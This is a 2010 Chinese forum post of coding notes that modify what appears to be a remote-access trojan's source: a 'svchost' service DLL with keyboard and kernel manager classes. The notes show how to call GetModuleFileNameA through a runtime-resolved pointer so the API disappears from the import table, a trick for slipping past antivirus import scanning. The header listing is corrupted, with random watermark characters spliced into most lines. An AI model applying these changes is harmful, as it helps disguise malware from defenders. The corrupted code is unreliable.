
ice_xke 发表于 2010-10-19 12:30

全局动态调用

全局动态调用笔记
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
----------------------------------------
DTDY.h:

#if _MSC_VER>1000
y3Y/?K[.G4@ \w/q:h #pragma once
)Q:L,L&F;T;M-kX4v #endif //_MSC_VER>1000
8_8w)bH2u jyM4pad'X #include<windows.h>
8h)C)Bun5S,a[3P*K
2J I,uu}DF typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
*pfmv/S X]7y^ F+fz class DTDY
H IBjaY5Pzu@8t {ebH*W!`,^
public:O9DF\j
DTDY();^(G%pxWJ%Mh
virtual ~DTDY();;W+v+G*NN$S$r? Z v2a
public:
/n3L7b*ev [| static pGetModuleFileNameA MyGetModuleFileName;l#k,n0n&`c5^(o
static BOOL FunInitiallization();E r,K!n Y&X
}; WS&L/n|:e(Dc
#endif
----------------------------------------
DTDY.cpp:

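#include "DTDY.h"

// Stays NULL until FunInitiallization() has resolved the export.
pGetModuleFileNameA DTDY::MyGetModuleFileName = NULL;

DTDY::DTDY()
{
}

DTDY::~DTDY()
{
}

// Looks up GetModuleFileNameA in kernel32.dll and stores its address in
// MyGetModuleFileName.
//
// Returns TRUE when the pointer was resolved, FALSE when kernel32.dll could
// not be located or does not export the name.
//
// NOTE(review): a module that reaches GetModuleFileNameA only through this
// pointer will not list it in its import table. When auditing a binary built
// this way, inspect the name strings handed to GetProcAddress instead of
// relying on the import list alone.
BOOL DTDY::FunInitiallization()
{
    // This routine is called from DllMain (DLL_PROCESS_ATTACH), where calling
    // LoadLibrary is unsafe because the loader lock is held. kernel32.dll is
    // already mapped into every Win32 process, so fetching its existing handle
    // is sufficient and also avoids taking a reference that is never released.
    // The explicit A variant keeps the narrow string literal valid in UNICODE
    // builds.
    HMODULE hModule = GetModuleHandleA("kernel32.dll");
    if (hModule == NULL)
        return FALSE;

    MyGetModuleFileName = reinterpret_cast<pGetModuleFileNameA>(
        GetProcAddress(hModule, "GetModuleFileNameA"));

    // The listing had `if(!MyGetModuleFileName=)`, which does not compile;
    // the intent is a plain NULL test on the resolved pointer.
    if (!MyGetModuleFileName)
        return FALSE;

    return TRUE;
}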
----------------------------------------
svchost.cpp:

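#include "DTDY.h"

// DLL entry point. On process attach it resolves the function pointers held
// by DTDY before any other code in the module can call through them.
//
// Returns FALSE on DLL_PROCESS_ATTACH when resolution fails, which makes the
// loader reject the DLL; returns TRUE for every other notification.
BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Fail the load rather than leave MyGetModuleFileName NULL for
        // later callers to dereference.
        if (!DTDY::FunInitiallization())
            return FALSE;
        break;
    }

    // The listing fell off the end of a BOOL function here; an explicit
    // result is required, otherwise the value seen by the loader is undefined.
    return TRUE;
}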

GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
改写为
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
----------------------------------------
KernelManager.cpp:

#include "../DTDY.h"
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
改写为
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
----------------------------------------
